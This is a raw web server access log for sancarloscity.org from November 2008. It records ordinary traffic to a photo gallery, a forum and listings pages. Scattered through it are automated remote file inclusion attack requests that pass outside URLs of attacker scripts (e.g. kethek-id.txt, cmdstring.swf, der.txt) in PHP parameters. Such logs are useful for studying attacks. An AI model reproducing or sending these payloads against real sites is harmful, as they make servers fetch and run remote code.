12.25.213.2 - - [15/Nov/2008:04:50:33 -0800] "GET /picgallery/albums/userpics/10001/mURI_temp_e45d90fd.jpg HTTP/1.1" 200 24242 "http://www.sancarloscity.org/picgallery/displayimage.php?album=lastup&cat=21&pos=16" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
70.85.149.242 - - [15/Nov/2008:04:50:34 -0800] "GET /logs/access_080918.log//?custompluginfile[]=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt??? HTTP/1.1" 404 760 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:50:34 -0800] "GET /picgallery/displayimage.php?album=lastup&cat=21&pos=17 HTTP/1.1" 200 10365 "http://www.sancarloscity.org/picgallery/displayimage.php?album=lastup&cat=21&pos=16" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:50:35 -0800] "GET /picgallery/albums/userpics/10001/mURI_temp_5122862e.jpg HTTP/1.1" 200 17865 "http://www.sancarloscity.org/picgallery/displayimage.php?album=lastup&cat=21&pos=17" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
61.247.222.55 - - [15/Nov/2008:04:50:35 -0800] "GET /robots.txt HTTP/1.1" 200 44 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.sancarloscity.org"
88.2.188.74 - - [15/Nov/2008:04:50:35 -0800] "GET /logs/access_081006.log//?custompluginfile[]=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 760 "-" "libwww-perl/5.805" "www.sancarloscity.org"
88.2.188.74 - - [15/Nov/2008:04:50:35 -0800] "GET /?custompluginfile[]=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 200 44225 "-" "libwww-perl/5.805" "www.sancarloscity.org"
61.247.222.55 - - [15/Nov/2008:04:50:35 -0800] "GET /jodera2/viewtopic.php?p=28161 HTTP/1.1" 200 33206 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:50:38 -0800] "GET /picgallery/index.php HTTP/1.1" 200 62133 "http://www.sancarloscity.org/picgallery/displayimage.php?album=lastup&cat=21&pos=17" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:50:38 -0800] "GET /picgallery/albums/userpics/10001/thumb_miss25.jpg HTTP/1.1" 200 2313 "http://www.sancarloscity.org/picgallery/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:50:38 -0800] "GET /picgallery/albums/userpics/10001/thumb_IMG_6766.jpg HTTP/1.1" 200 2243 "http://www.sancarloscity.org/picgallery/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:50:39 -0800] "GET /picgallery/albums/userpics/10001/thumb_IMG_7689.jpg HTTP/1.1" 200 2149 "http://www.sancarloscity.org/picgallery/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:50:39 -0800] "GET /picgallery/albums/userpics/10001/thumb_DSC00255.JPG HTTP/1.1" 200 2946 "http://www.sancarloscity.org/picgallery/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:50:39 -0800] "GET /picgallery/albums/userpics/10001/thumb_2sancalros5.jpg HTTP/1.1" 200 3070 "http://www.sancarloscity.org/picgallery/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:50:39 -0800] "GET /picgallery/albums/userpics/10001/thumb_DSC01249.JPG HTTP/1.1" 200 3703 "http://www.sancarloscity.org/picgallery/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:50:39 -0800] "GET /picgallery/albums/userpics/10001/thumb_2sancalros15.jpg HTTP/1.1" 200 2552 "http://www.sancarloscity.org/picgallery/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:50:39 -0800] "GET /picgallery/albums/userpics/10001/thumb_pf19.jpeg HTTP/1.1" 200 4548 "http://www.sancarloscity.org/picgallery/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
88.2.188.74 - - [15/Nov/2008:04:50:40 -0800] "GET /logs//?custompluginfile[]=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 200 73598 "-" "libwww-perl/5.805" "www.sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:50:51 -0800] "GET /picgallery/login.php?referer=%2Fpicgallery%2Findex.php HTTP/1.1" 200 4695 "http://www.sancarloscity.org/picgallery/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:50:52 -0800] "GET /picgallery/themes/classic/images/button_bg.gif HTTP/1.1" 200 834 "http://www.sancarloscity.org/picgallery/login.php?referer=%2Fpicgallery%2Findex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
210.245.226.28 - - [15/Nov/2008:04:50:52 -0800] "GET /logs/access_080913.log//modules/vwar/admin/admin.php?vwar_root=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 788 "-" "libwww-perl/5.803" "www.sancarloscity.org"
210.245.226.28 - - [15/Nov/2008:04:50:52 -0800] "GET /logs/access_080913.log//modules/vwar/admin/admin.php?vwar_root=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 788 "-" "libwww-perl/5.803" "www.sancarloscity.org"
210.245.226.28 - - [15/Nov/2008:04:50:52 -0800] "GET /logs/access_080913.log//modules/vwar/admin/admin.php?vwar_root=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 788 "-" "libwww-perl/5.803" "www.sancarloscity.org"
88.2.188.74 - - [15/Nov/2008:04:50:52 -0800] "GET /logs/access_080918.log//?custompluginfile[]=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 760 "-" "libwww-perl/5.805" "www.sancarloscity.org"
210.245.226.28 - - [15/Nov/2008:04:50:52 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 764 "-" "libwww-perl/5.803" "www.sancarloscity.org"
210.245.226.28 - - [15/Nov/2008:04:50:52 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 764 "-" "libwww-perl/5.803" "www.sancarloscity.org"
210.245.226.28 - - [15/Nov/2008:04:50:52 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 764 "-" "libwww-perl/5.803" "www.sancarloscity.org"
210.245.226.28 - - [15/Nov/2008:04:50:53 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 770 "-" "libwww-perl/5.803" "www.sancarloscity.org"
210.245.226.28 - - [15/Nov/2008:04:50:53 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 770 "-" "libwww-perl/5.803" "www.sancarloscity.org"
210.245.226.28 - - [15/Nov/2008:04:50:53 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 770 "-" "libwww-perl/5.803" "www.sancarloscity.org"
210.245.226.28 - - [15/Nov/2008:04:50:55 -0800] "GET /logs/access_080913.log//modules/vwar/admin/admin.php?vwar_root=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 788 "-" "libwww-perl/5.803" "www.sancarloscity.org"
210.245.226.28 - - [15/Nov/2008:04:50:55 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 764 "-" "libwww-perl/5.803" "www.sancarloscity.org"
210.245.226.28 - - [15/Nov/2008:04:50:56 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 770 "-" "libwww-perl/5.803" "www.sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:50:57 -0800] "GET /picgallery/index.php HTTP/1.1" 200 62180 "http://www.sancarloscity.org/picgallery/login.php?referer=%2Fpicgallery%2Findex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:50:57 -0800] "GET /picgallery/albums/userpics/10001/thumb_mURI_temp_ceba5949.jpg HTTP/1.1" 200 3447 "http://www.sancarloscity.org/picgallery/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:50:57 -0800] "GET /picgallery/albums/userpics/10001/thumb_IMG_6810.jpg HTTP/1.1" 200 1975 "http://www.sancarloscity.org/picgallery/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:50:57 -0800] "GET /picgallery/albums/userpics/10001/thumb_IMG_6727.jpg HTTP/1.1" 200 2639 "http://www.sancarloscity.org/picgallery/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:50:57 -0800] "GET /picgallery/albums/userpics/10001/thumb_pintabata.JPG HTTP/1.1" 200 3696 "http://www.sancarloscity.org/picgallery/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:50:57 -0800] "GET /picgallery/albums/userpics/10001/thumb_DSC02892.jpg HTTP/1.1" 200 2588 "http://www.sancarloscity.org/picgallery/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:50:57 -0800] "GET /picgallery/albums/userpics/10001/thumb_IMG_7686.jpg HTTP/1.1" 200 3056 "http://www.sancarloscity.org/picgallery/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:50:57 -0800] "GET /picgallery/albums/userpics/10001/thumb_mURI_temp_c1ecdf07.jpg HTTP/1.1" 200 4079 "http://www.sancarloscity.org/picgallery/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
209.172.57.245 - - [15/Nov/2008:04:51:03 -0800] "GET /logs/access_080921.log/errors.php?error=http://www.keoeeit.com/go/arab.txt? HTTP/1.1" 404 769 "-" "libwww-perl/5.810" "www.sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:51:09 -0800] "GET /picgallery/index.php HTTP/1.1" 200 62117 "http://www.sancarloscity.org/picgallery/displayimage.php?album=lastup&cat=21&pos=6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:51:09 -0800] "GET /picgallery/albums/userpics/10001/thumb_IMG_6758.jpg HTTP/1.1" 200 2268 "http://www.sancarloscity.org/picgallery/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:51:09 -0800] "GET /picgallery/albums/userpics/10001/thumb_DSC03793.JPG HTTP/1.1" 200 3302 "http://www.sancarloscity.org/picgallery/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:51:09 -0800] "GET /picgallery/albums/userpics/10001/thumb_DSC01449.JPG HTTP/1.1" 200 2162 "http://www.sancarloscity.org/picgallery/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:51:09 -0800] "GET /picgallery/albums/userpics/10001/thumb_035.JPG HTTP/1.1" 200 3756 "http://www.sancarloscity.org/picgallery/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:51:09 -0800] "GET /picgallery/albums/userpics/10001/thumb_DSC00223.JPG HTTP/1.1" 200 2648 "http://www.sancarloscity.org/picgallery/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:51:09 -0800] "GET /picgallery/albums/userpics/10001/thumb_pintabata18.JPG HTTP/1.1" 200 4086 "http://www.sancarloscity.org/picgallery/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:51:09 -0800] "GET /picgallery/albums/userpics/10001/thumb_miss22.jpg HTTP/1.1" 200 2881 "http://www.sancarloscity.org/picgallery/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:51:09 -0800] "GET /picgallery/albums/userpics/10001/thumb_IMG_7610.jpg HTTP/1.1" 200 2608 "http://www.sancarloscity.org/picgallery/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
91.184.4.157 - - [15/Nov/2008:04:51:49 -0800] "GET /?custompluginfile[]=http://comtechservices.net/phpforms/der.txt?? HTTP/1.1" 200 44225 "-" "libwww-perl/5.79" "www.sancarloscity.org"
91.184.4.157 - - [15/Nov/2008:04:51:49 -0800] "GET /logs/access_081006.log//?custompluginfile[]=http://comtechservices.net/phpforms/der.txt?? HTTP/1.1" 404 760 "-" "libwww-perl/5.79" "www.sancarloscity.org"
91.184.4.157 - - [15/Nov/2008:04:51:49 -0800] "GET /logs//?custompluginfile[]=http://comtechservices.net/phpforms/der.txt?? HTTP/1.1" 200 73598 "-" "libwww-perl/5.79" "www.sancarloscity.org"
91.184.4.157 - - [15/Nov/2008:04:51:58 -0800] "GET /logs/access_080918.log//?custompluginfile[]=http://comtechservices.net/phpforms/der.txt?? HTTP/1.1" 404 760 "-" "libwww-perl/5.79" "www.sancarloscity.org"
67.195.37.186 - - [15/Nov/2008:04:52:12 -0800] "GET /listings/listing/results.php?letter=p&category_id=700 HTTP/1.0" 200 24468 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
67.195.37.186 - - [15/Nov/2008:04:52:12 -0800] "GET /listings/layout/general_structure.css HTTP/1.0" 200 28444 "http://www.sancarloscity.org/listings/listing/results.php?letter=p&category_id=700" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
67.195.37.186 - - [15/Nov/2008:04:52:12 -0800] "GET /listings/layout/general_noimage.css HTTP/1.0" 200 89 "http://www.sancarloscity.org/listings/listing/results.php?letter=p&category_id=700" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
67.195.37.186 - - [15/Nov/2008:04:52:12 -0800] "GET /listings/layout/listing_result.css HTTP/1.0" 200 12330 "http://www.sancarloscity.org/listings/listing/results.php?letter=p&category_id=700" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
67.195.37.186 - - [15/Nov/2008:04:52:12 -0800] "GET /listings/layout/listing_color.css HTTP/1.0" 200 4496 "http://www.sancarloscity.org/listings/listing/results.php?letter=p&category_id=700" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
67.195.37.186 - - [15/Nov/2008:04:52:13 -0800] "GET /listings/layout/color/white_blue.css HTTP/1.0" 200 24170 "http://www.sancarloscity.org/listings/listing/results.php?letter=p&category_id=700" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
72.30.79.34 - - [15/Nov/2008:04:52:15 -0800] "GET /listings/event/ HTTP/1.0" 200 13888 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
82.99.30.54 - - [15/Nov/2008:04:52:41 -0800] "GET /jodera2/faq.php?sid=9ac115b2f43b89900e418d546efab6b7 HTTP/1.0" 200 68232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
208.111.154.16 - - [15/Nov/2008:04:53:12 -0800] "GET /picgallery/displayimage.php?album=random&cat=11&pos=-251 HTTP/1.1" 200 10096 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sancarloscity.org"
89.138.173.230 - - [15/Nov/2008:04:53:17 -0800] "GET /logs/access_080415.log/wp-signup.php HTTP/1.1" 404 772 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:53:42 -0800] "GET /jodera2/viewtopic.php?p=30756 HTTP/1.1" 200 82476 "http://www.google.ru/search?hl=ru&q=%D0%BF%D0%BE%D1%80%D0%BD%D0%BE+%D0%B1%D0%B5%D1%81%D0%B0%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D0%BE&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=&aq=f&oq=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "www.sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:53:43 -0800] "GET /jodera2/templates/Cobalt/Cobalt.css HTTP/1.1" 200 15663 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=30756" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "www.sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:53:43 -0800] "GET /jodera2/templates/Cobalt/images/spacer.gif HTTP/1.1" 200 49 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=30756" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:53:43 -0800] "GET /jodera2/templates/Cobalt/images/logo_phpbb.jpg HTTP/1.1" 200 8430 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=30756" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:53:44 -0800] "GET /jodera2/templates/Cobalt/images/icon_mini_faq.gif HTTP/1.1" 200 706 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=30756" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:53:44 -0800] "GET /jodera2/templates/Cobalt/images/icon_mini_members.gif HTTP/1.1" 200 740 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=30756" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:53:44 -0800] "GET /jodera2/templates/Cobalt/images/icon_mini_search.gif HTTP/1.1" 200 722 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=30756" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:53:44 -0800] "GET /jodera2/templates/Cobalt/images/icon_mini_groups.gif HTTP/1.1" 200 751 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=30756" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:53:45 -0800] "GET /jodera2/templates/Cobalt/images/lang_english/icon_profile.gif HTTP/1.1" 200 918 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=30756" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:53:45 -0800] "GET /jodera2/templates/Cobalt/images/lang_english/icon_pm.gif HTTP/1.1" 200 736 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=30756" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:53:45 -0800] "GET /jodera2/templates/Cobalt/images/icon_mini_register.gif HTTP/1.1" 200 705 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=30756" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:53:46 -0800] "GET /jodera2/templates/Cobalt/images/icon_mini_profile.gif HTTP/1.1" 200 716 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=30756" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:53:46 -0800] "GET /jodera2/templates/Cobalt/images/icon_mini_message.gif HTTP/1.1" 200 734 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=30756" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:53:48 -0800] "GET /jodera2/templates/Cobalt/images/icon_mini_login.gif HTTP/1.1" 200 736 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=30756" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:53:48 -0800] "GET /jodera2/joderaban.gif HTTP/1.1" 200 598991 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=30756" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:53:51 -0800] "GET /jodera2/templates/Cobalt/images/lang_english/post.gif HTTP/1.1" 200 3070 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=30756" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:53:54 -0800] "GET /jodera2/templates/Cobalt/images/lang_english/reply.gif HTTP/1.1" 200 3137 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=30756" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:53:54 -0800] "GET /jodera2/templates/Cobalt/images/minipost_read.gif HTTP/1.1" 200 118 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=30756" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:53:55 -0800] "GET /jodera2/templates/Cobalt/images/lang_english/icon_quote.gif HTTP/1.1" 200 859 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=30756" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:53:55 -0800] "GET /jodera2/templates/Cobalt/images/icon_top.gif HTTP/1.1" 200 641 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=30756" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:53:55 -0800] "GET /jodera2/templates/Cobalt/images/lang_english/icon_email.gif HTTP/1.1" 200 850 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=30756" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:53:55 -0800] "GET /jodera2/templates/Cobalt/images/lang_english/icon_www.gif HTTP/1.1" 200 776 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=30756" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:53:56 -0800] "GET /jodera2/templates/Cobalt/images/lang_english/icon_aim.gif HTTP/1.1" 200 769 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=30756" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:53:56 -0800] "GET /jodera2/templates/Cobalt/images/lang_english/icon_yim.gif HTTP/1.1" 200 772 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=30756" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:53:56 -0800] "GET /jodera2/templates/Cobalt/images/lang_english/icon_msnm.gif HTTP/1.1" 200 834 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=30756" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:53:56 -0800] "GET /jodera2/templates/Cobalt/images/lang_english/icon_icq_add.gif HTTP/1.1" 200 752 "http://www.sancarloscity.org/jodera2/viewtopic.php?p=30756" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
84.16.230.107 - - [15/Nov/2008:04:54:03 -0800] "GET /jodera2/posting.php?mode=reply&t=32680 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32680" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)" "www.sancarloscity.org"
84.16.230.107 - - [15/Nov/2008:04:54:04 -0800] "GET /jodera2/login.php?redirect=posting.php&mode=reply&t=32680&sid=d8bfe2e11c3cba87bf5fda08fc2a6705 HTTP/1.0" 200 12363 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=32680&sid=d8bfe2e11c3cba87bf5fda08fc2a6705" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)" "www.sancarloscity.org"
